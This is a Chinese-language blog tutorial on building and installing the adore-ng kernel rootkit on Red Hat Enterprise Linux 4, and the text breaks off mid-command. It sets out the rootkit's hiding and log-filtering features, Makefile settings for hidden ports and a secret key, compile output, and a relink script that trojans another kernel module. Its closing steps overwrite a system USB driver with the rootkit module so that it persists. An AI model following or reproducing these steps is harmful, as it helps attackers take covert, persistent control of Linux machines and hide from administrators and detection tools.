Linux后门系列之adore-ng

作者：baoz
久之前写的一个文章，自己转回来。奇了怪了，当时我测试是可以隐藏端口的，但我现在折腾又隐藏不了端口，答案很快就会出来 ：）

找到原因了，东西还是原汁原味的好，遇到类似问题的请用原版，想知道问题出在哪的请自行diff。

前言：
kernel 2.6已经大步走入linux的世界，写后门的和用后门的也得跟上潮流。

简写约定：
fc:fedora core
rh:red hat
rhel4:red hat enterprise linux 4
sk:suckit
adore:adore-ng
rk:rootkit
lkm:loadable kernel modules

什么是adore-ng？
一个LKM rk,google adore会有很多详细的介绍。

为什么选择他？
1、我没弄到sk for 2.6的
2、fc2之后rh的内核默认就禁用了kmem了,sk无法inject the kernel on the fly，同时很多检查rk的程序也失效:)
3、adore是大牛Stealth写的，历史悠久，帮他测试的人N多，应该会比其他LKM稳定，LKM的稳定会严重的影响系统的稳定，所以选型我们必须要谨慎，就算功能再牛，玩一下就把系统挂了，还被别人发现了，那就得不尝失了。

看看功能：
[root@RHEL4 adore-ng]# cat FEATURES

If you never used adore before, here’s a list of supported
things:

o runs on kernel 2.4.x UP and SMP systems
o runs on kernel 2.6.x UP and SMP systems, i386 and x86_64 archs tested
o file and directory hiding
o process hiding
o socket-hiding (no matter whether LISTENing, CONNECTED etc)
o full-capability back door
o does not utilize sys_call_table but VFS layer
o KISS principle, to have as less things in there as possible
but also being as much powerful as possible
o hides itself from /proc and /sys filesystems

o syslog filtering: logs generated by hidden processes never appear
on the syslog UNIX socket anymore
o wtmp/utmp/lastlog filtering: writing of xtmp entries by hidden processes
do not appear in the file, except you force it by using special hidden
AND authenticated process (a sshd back door is usually only hidden thus
xtmp entries written by sshd don’t make it to disk)
o (optional) relinking of LKMs as described in phrack #61 aka LKM infection
to make it possible to be automatically reloaded after reboots (2.4 and 2.6)
本文环境：
真实机器非虚拟机
[root@RHEL4 adore-ng]# uname -a; cat /etc/redhat-release
linux RHEL4 2.6.9-5.EL #1 Wed Jan 5 19:22:18 EST 2005 i686 athlon i386 GNU/linux
Red Hat Enterprise linux AS release 4 (Nahant)

下载：
google adore-ng
或者可以在素包子的网站 http://baoz.net找找。

编辑和编译：
[root@RHEL4 adore-ng]# mv Makefile.2.6 Makefile

然后编辑下面的内容
EXTRA_CFLAGS=-DELITE_UID=2618748389U -DELITE_GID=4063569279U
EXTRA_CFLAGS+=-DCURRENT_ADORE=54
EXTRA_CFLAGS+=-DADORE_KEY=”fgjgggfd”

这个是隐藏的TCP端口，最后的0不要动。
u_short HIDDEN_SERVICES[] =
{2222, 7350, 0};
如果你是SMP的机器，就把下面打开。
EXTRA_CFLAGS+=-D__SMP__

设置你内核代码的位置
KERNEL_SOURCE=/usr/src/linux

OK，保存退出，make

[root@RHEL4 adore-ng]# make
cc -DELITE_UID=2648745389U -DELITE_GID=6063589279U -DCURRENT_ADORE=54 -DADORE_KEY=”djksdfnvn” -DHIDE ava.c libinvisible.c -o ava
ava.c:47: warning: integer constant is too large for “unsigned long” type
ava.c:47: warning: large integer implicitly truncated to unsigned type
libinvisible.c: In function `adore_hidefile’:
libinvisible.c:76: warning: integer constant is too large for “unsigned long” type
libinvisible.c:76: warning: large integer implicitly truncated to unsigned type
make -C /usr/src/linux SUBDIRS=`pwd` modules
make[1]: Entering directory `/usr/src/kernels/2.6.9-5.EL-i686′
CC [M] /root/adore-ng/adore-ng-2.6.o
/root/adore-ng/adore-ng-2.6.c:56: warning: `MODULE_PARM_’ is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c:59: warning: `MODULE_PARM_’ is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c:61: warning: `MODULE_PARM_’ is deprecated (declared at include/linux/module.h:552)
/root/adore-ng/adore-ng-2.6.c: In function `adore_opt_filldir’:
/root/adore-ng/adore-ng-2.6.c:281: warning: integer constant is too large for “unsigned long” type
/root/adore-ng/adore-ng-2.6.c:281: warning: comparison is always false due to limited range of data type
/root/adore-ng/adore-ng-2.6.c: In function `adore_root_filldir’:
/root/adore-ng/adore-ng-2.6.c:363: warning: integer constant is too large for “unsigned long” type
/root/adore-ng/adore-ng-2.6.c:363: warning: comparison is always false due to limited range of data type
Building modules, stage 2.
MODPOST
CC      /root/adore-ng/adore-ng-2.6.mod.o
LD [M] /root/adore-ng/adore-ng-2.6.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.9-5.EL-i686′
cc -O2 symsed.c -o symsed

说一下他的relink，就是把adore插到别的模块去的功能，我们看看他做了啥
system(“cp $lkm_path t.ko”);
system(“./symsed t.ko zero;ld -r adore-ng-2.6.ko t.ko -o z.ko; rm -f t.ko”);
print “nCopy trojaned LKM back to original LKM? (y/n)n”;

while ($yn !~ /^(y|n)$/i) {
$yn = <STDIN>;
$yn =~ s/n//;
}

if ($yn =~ /y/i) {
system(“cp z.ko $lkm_path”);
} else {
print “nOutput LKM is z.kon”;
}
我在RHEL4下插入模块后模块都无法启动，不过没关系，我们不插入，我们替换:)
只有十分少数人是安装了系统后modprobe -r的，所以我们可以很容易的替换一些系统不十分需要的模块，我们看看我的模块
[root@RHEL4 adore-ng]# lsmod
Module                  Size Used by
dm_mod                 54741 0
ohci_hcd               21713 0
snd_intel8×0           33769 0
snd_ac97_codec         63889 1 snd_intel8×0
snd_pcm_oss            49017 0
snd_mixer_oss          17985 1 snd_pcm_oss
snd_pcm                96841 2 snd_intel8×0,snd_pcm_oss
snd_timer              29893 1 snd_pcm
snd_page_alloc          9673 2 snd_intel8×0,snd_pcm
snd_mpu401_uart         8769 1 snd_intel8×0
snd_rawmidi            26597 1 snd_mpu401_uart
snd_seq_device          8137 1 snd_rawmidi
snd                    54949 9

snd_intel8×0,snd_ac97_codec,snd_pcm_oss,snd_mixer_oss,snd_pcm,snd_timer,snd_mpu401_uart,snd_rawmidi,snd_seq_device
soundcore               9889 1 snd
sis900                 18756 0
ext3                  116809 1
jbd                    71257 1 ext3

我们选一个 Used By是0而且不怎么用的模块，比如usb的驱动，呵呵
ehci_hcd刚才已经被我用了，所以这里看不到，我们还可以用ohci_hcd或者是声卡的模块。

看看他在哪
[root@RHEL4 adore-ng]# modprobe -l | grep ehci
/lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko

卸了他
[root@RHEL4 adore-ng]# modprobe -r ehci-hcd
替换他
[root@RHEL4 adore-ng]# cp adore-ng-2.6.ko /lib/modules/2.6.9-5.EL/kernel/drivers/usb/host/ehci-hcd.ko
加载他
[root@RHEL4 adore-ng]# modprob